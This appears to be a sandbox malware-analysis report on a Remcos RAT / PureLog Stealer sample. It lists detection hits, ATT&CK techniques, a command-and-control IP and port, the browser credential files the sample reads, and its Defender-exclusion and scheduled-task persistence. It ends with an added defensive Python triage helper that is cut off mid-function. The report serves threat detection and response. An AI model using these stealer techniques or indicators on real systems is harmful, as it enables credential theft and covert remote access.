                  Source: Yara match; File source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: PEbZthAqV9.exe PID: 7952, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 18_2_0040A953
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 18_2_0040AA71
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: \key3.db 18_2_0040AA71

                  Remote Access Functionality

                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-Y7J88P
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-Y7J88P
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.7410000.4.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.7410000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.3d6e790.3.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.3d6e790.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000000.00000002.1834812761.0000000007410000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000002.1831199918.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: PEbZthAqV9.exe PID: 7952, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe Code function: cmd.exe 18_2_0040567A
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (11) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (12) | Ingress Tool Transfer (12) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
                  Credentials | Domains | Default Accounts | Command and Scripting Interpreter (1) | Windows Service (1) | Access Token Manipulation (1) | Deobfuscate/Decode Files or Information (11) | Input Capture (111) | Account Discovery (1) | Remote Desktop Protocol | Input Capture (111) | Encrypted Channel (2) | Exfiltration Over Bluetooth | Defacement (1)
                  Email Addresses | DNS Server | Domain Accounts | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Windows Service (1) | Obfuscated Files or Information (4) | Credentials In Files (2) | System Service Discovery (1) | SMB/Windows Admin Shares | Clipboard Data (3) | Non-Standard Port (1) | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Service Execution (2) | Login Hook | Process Injection (122) | Software Packing (22) | NTDS | File and Directory Discovery (3) | Distributed Component Object Model | Input Capture | Remote Access Software (1) | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Scheduled Task/Job (1) | Timestomp (1) | LSA Secrets | System Information Discovery (33) | SSH | Keylogging | Non-Application Layer Protocol (2) | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | Security Software Discovery (121) | VNC | GUI Input Capture | Application Layer Protocol (12) | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Masquerading (1) | DCSync | Virtualization/Sandbox Evasion (31) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (31) | Proc Filesystem | Process Discovery (3) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (1) | /etc/passwd and /etc/shadow | Application Window Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (122) | Network Sniffing | System Owner/User Discovery (1)
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Behavior Graph
Behavior Graph ID: 1570841
Sample: PEbZthAqV9.exe
Startdate: 08/12/2024
Architecture: WINDOWS
Score: 100

Start (node 2)
  DNS/IP: geoplugin.net
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
  Started: PEbZthAqV9.exe (process 8); myTuDsvNcebev.exe (process 12)

PEbZthAqV9.exe (process 8)
  Dropped: C:\Users\user\AppData\...\myTuDsvNcebev.exe (PE32); C:\...\myTuDsvNcebev.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp53D2.tmp (XML); C:\Users\user\AppData\...\PEbZthAqV9.exe.log (ASCII)
  Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  Started: PEbZthAqV9.exe (process 14); powershell.exe (process 18); powershell.exe (process 20); schtasks.exe (process 22)

myTuDsvNcebev.exe (process 12)
  Signatures: Multi AV Scanner detection for dropped file; Contains functionalty to change the wallpaper; Machine Learning detection for dropped file; 4 other signatures
  Started: myTuDsvNcebev.exe (process 24); schtasks.exe (process 26); myTuDsvNcebev.exe (process 28); 3 other processes (node 30)

PEbZthAqV9.exe (process 14)
  DNS/IP: 41.216.183.238, 49737, 7112, AS40676US, South Africa; geoplugin.net 178.237.33.50, 49738, 80, ATOM86-ASATOM86NL, Netherlands
  Signatures: Detected Remcos RAT

powershell.exe (process 18)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe (process 32); WmiPrvSE.exe (process 34)

powershell.exe (process 20)
  Started: conhost.exe (process 36)

schtasks.exe (process 22)
  Started: conhost.exe (process 38)

schtasks.exe (process 26)
  Started: conhost.exe (process 40)

Source | Detection | Scanner | Label
PEbZthAqV9.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.PureLogStealer
PEbZthAqV9.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.PureLogStealer

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://www.ascendercorp.com/typedesigners.htmls | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
41.216.183.238 | unknown | South Africa | 40676 | AS40676US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1570841
Start date and time: 2024-12-08 09:03:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PEbZthAqV9.exe (renamed because the original name is a hash value)
Original Sample Name: 10ab4b6fb83aea3840ac04855974f62d.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@27/16@1/2
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 138
• Number of non-executed functions: 196
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target PEbZthAqV9.exe, PID 7952 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: PEbZthAqV9.exe
Time | Type | Description
03:04:03 | API Interceptor | 4293247x Sleep call for process: PEbZthAqV9.exe modified
03:04:10 | API Interceptor | 81x Sleep call for process: powershell.exe modified
03:04:14 | API Interceptor | 1x Sleep call for process: myTuDsvNcebev.exe modified
08:04:12 | Task Scheduler | Run new task: myTuDsvNcebev path: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
178.237.33.50 | IB9876789000.bat.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | scan_241205-801_draft_PO.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | NewOrder12052024.js | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | W6iQkG4jZ1.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | VERSION.dll.dll | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | LdSbZG1iH6.exe | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | 1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | tXcFA8apHU.exe | malicious | Remcos | geoplugin.net/json.gp
41.216.183.238 | Banco Santander Totta _Aconselhamento_Pagamento.img | malicious | Remcos |
41.216.183.238 | Chase_Bank_Payemnt_Advice.bat.exe | malicious | Remcos, PureLog Stealer |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
geoplugin.net | IB9876789000.bat.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | scan_241205-801_draft_PO.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | NewOrder12052024.js | malicious | Remcos | 178.237.33.50
geoplugin.net | W6iQkG4jZ1.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | VERSION.dll.dll | malicious | Remcos | 178.237.33.50
geoplugin.net | LdSbZG1iH6.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | 1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | tXcFA8apHU.exe | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS40676US | jew.arm6.elf | malicious | Unknown | 107.176.140.9
AS40676US | jew.sh4.elf | malicious | Unknown | 172.83.185.2
AS40676US | jew.arm7.elf | malicious | Mirai | 103.126.136.29
AS40676US | http://web-quorvyn.azurewebsites.net | malicious | TechSupportScam | 103.126.138.87
AS40676US | http://womenluxuryfashion.com | malicious | TechSupportScam | 103.126.138.87
AS40676US | arm.nn.elf | malicious | Mirai, Okiru | 45.35.34.126
AS40676US | http://editableslides.co | malicious | HTMLPhisher, TechSupportScam | 103.126.138.87
AS40676US | xd.arm.elf | malicious | Mirai | 104.149.171.104
AS40676US | Employee_Important_Message.pdf | malicious | HTMLPhisher | 103.126.138.87
AS40676US | RFQ 9-XTC-204-60THD.xlsx.exe | malicious | Quasar | 103.126.138.87
ATOM86-ASATOM86NL | IB9876789000.bat.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | scan_241205-801_draft_PO.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | NewOrder12052024.js | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | W6iQkG4jZ1.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | VERSION.dll.dll | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | LdSbZG1iH6.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | 1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | tXcFA8apHU.exe | malicious | Remcos | 178.237.33.50
Process: C:\Users\user\Desktop\PEbZthAqV9.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: identical to the previous record (same size and hashes)

Process: C:\Users\user\Desktop\PEbZthAqV9.exe
File Type: JSON data
Category: dropped
Size (bytes): 963
Entropy (8bit): 5.014904284428935
Encrypted: false
SSDEEP: 12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: B66CFB6461E507BB577CDE91F270844E
SHA1: 6D952DE48032731679F8718D1F1C3F08202507C3
SHA-256: E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
SHA-512: B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
Malicious: false
Preview: {. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.379552885213346
Encrypted: false
SSDEEP: 48:fWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//ZMtUyus:fLHxvCZfIfSKRHmOugras
MD5: 8E2B5AEFC842554A5F44260832D5BF81
SHA1: A368B0CF9C7A7C458FFDC4DAE8159E9D6965E482
SHA-256: E345FB0EA03196C7E1195AB8D24A20CF26E501F22600B0F0CE156B2AAD7C8B16
SHA-512: 23E8AC189D4933282926751E122BA1BB32C8A45CB8A444AD0A4F0CB59226AD684D87172CCCE1B93B6C8FE3EDD3F706AE4B1A9F4F50F453E7A75E0EBB16D93719
Malicious: false
Preview: @...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Seven further files with exactly the same size (60 bytes), hashes and content were dropped by powershell.exe; their records are identical to the one above and are not repeated here. This one-line script is PowerShell's own probe, written each time the PowerShell host starts, to test whether AppLocker or WDAC enforces script lockdown (Constrained Language Mode). It is not malware content; what matters is the process that launched PowerShell and the command line it was given, which this report attributes to the sample's Defender-exclusion step.

Process: C:\Users\user\Desktop\PEbZthAqV9.exe
File Type: XML 1.0 document, ASCII text
Category: dropped
Size (bytes): 1579
Entropy (8bit): 5.1093549621335965
Encrypted: false
SSDEEP: 24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTNv
MD5: 7249B6715C54DC68043E1EE819E25B6F
SHA1: 796195736C30F12B710345FF0CDFB741FC1C493C
SHA-256: 610E79EB818BAAD148F6509427CCD1F9CB828E6483B22715EE7934BC7AF10190
SHA-512: A06438924D53E5A6D2A6CFEE97FE6B42360AAC40B0EA35C377CCB600176ED1283810FA4CF47093C02A413C0605C7D56ECAF5FEDD28DFEFA6F1DC6FD094BFA477
Malicious: true
Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

Process: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
File Type: XML 1.0 document, ASCII text
Category: dropped
Size (bytes): 1579
Entropy (8bit): 5.1093549621335965
Encrypted: false
SSDEEP: 24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTNv
MD5: 7249B6715C54DC68043E1EE819E25B6F
SHA1: 796195736C30F12B710345FF0CDFB741FC1C493C
SHA-256: 610E79EB818BAAD148F6509427CCD1F9CB828E6483B22715EE7934BC7AF10190
SHA-512: A06438924D53E5A6D2A6CFEE97FE6B42360AAC40B0EA35C377CCB600176ED1283810FA4CF47093C02A413C0605C7D56ECAF5FEDD28DFEFA6F1DC6FD094BFA477
Malicious: false
Preview: identical to the previous record (same size and hashes)
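The two task definitions above are the persistence mechanism: a Task Scheduler XML that fires a logon trigger under the interactive token of the registering user, with no elevation requested. The following Python is an added triage helper, not code from the report or from the sample; it parses the same <Task> XML format and lists the attributes a responder checks first. SAMPLE_TASK_XML is constructed from the fields visible in the preview; its <Actions>/<Exec> element (pointing at the %AppData% copy of the sample) is an assumption, because the preview is truncated before that element. The decode step deliberately ignores the encoding="UTF-16" declaration, since the report types the dropped file as ASCII text and a parser that trusts the declaration would reject it.

```python
"""Triage a Task Scheduler XML definition for persistence indicators.

Added example, not part of the Joe Sandbox report or the Remcos sample.
"""
import codecs
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Directories an unprivileged user can write to; a task whose action lives
# here is far more often malware persistence than an installed product.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

# Constructed sample: the fields shown in the preview above, plus an
# ASSUMED <Actions> block (the preview cuts off before it).
SAMPLE_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\myTuDsvNcebev.exe</Command>
    </Exec>
  </Actions>
</Task>
"""


def decode_task_file(data: bytes) -> str:
    """Decode a task file by its BOM, not by its XML declaration.

    The dropped file declares encoding="UTF-16" yet is typed as ASCII text;
    trusting the bytes rather than the prologue keeps the parser working.
    """
    if data.startswith(codecs.BOM_UTF16_LE) or data.startswith(codecs.BOM_UTF16_BE):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")


def parse_task(text: str) -> ET.Element:
    """Parse task XML, dropping the prologue so a mismatched encoding
    declaration cannot derail the parser."""
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", text, count=1)
    return ET.fromstring(body)


def _text(root: ET.Element, path: str) -> str:
    node = root.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def triage_task(text: str) -> Dict[str, object]:
    """Summarise the persistence-relevant fields and list the indicators."""
    root = parse_task(text)
    author = _text(root, "t:RegistrationInfo/t:Author")
    registered = _text(root, "t:RegistrationInfo/t:Date")
    logon_trigger = _text(root, "t:Triggers/t:LogonTrigger/t:Enabled").lower() == "true"
    logon_type = _text(root, "t:Principals/t:Principal/t:LogonType")
    run_level = _text(root, "t:Principals/t:Principal/t:RunLevel")
    commands: List[str] = [
        (c.text or "").strip() for c in root.findall("t:Actions/t:Exec/t:Command", NS)
    ]
    indicators: List[str] = []
    if logon_trigger:
        indicators.append("runs at every logon")
    if logon_type == "InteractiveToken":
        indicators.append("runs inside the interactive session (keyboard, clipboard, screen)")
    if any(any(m in c.lower() for m in USER_WRITABLE) for c in commands):
        indicators.append("action binary lives in a user-writable directory")
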